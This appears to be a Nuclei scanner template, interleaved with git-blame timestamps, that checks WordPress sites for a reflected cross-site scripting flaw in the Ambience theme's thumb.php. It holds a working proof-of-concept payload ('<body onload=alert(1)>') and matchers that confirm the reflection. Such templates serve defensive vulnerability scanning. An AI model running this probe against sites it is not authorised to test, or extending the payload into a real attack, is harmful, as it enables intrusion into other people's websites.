2021-07-11 02:16:13 +00:00
|
|
|
id: wp-ambience-xss
|
|
|
|
|
|
|
|
info:
|
2022-08-06 16:54:58 +00:00
|
|
|
name: WordPress Theme Ambience <= 1.0 - Cross-Site Scripting (XSS)
|
2021-07-11 02:16:13 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2022-08-10 09:20:05 +00:00
|
|
|
description: |
|
|
|
|
The ambience WordPress theme was affected by a Cross-Site Scripting (XSS) security vulnerability.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/38568
|
2022-08-06 16:54:58 +00:00
|
|
|
- https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
|
2022-08-10 09:20:05 +00:00
|
|
|
tags: wordpress,xss,wp-plugin,wp
|
2021-07-11 02:16:13 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-08-10 09:20:05 +00:00
|
|
|
part: body
|
2021-07-11 02:16:13 +00:00
|
|
|
words:
|
|
|
|
- "<body onload=alert(1)>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|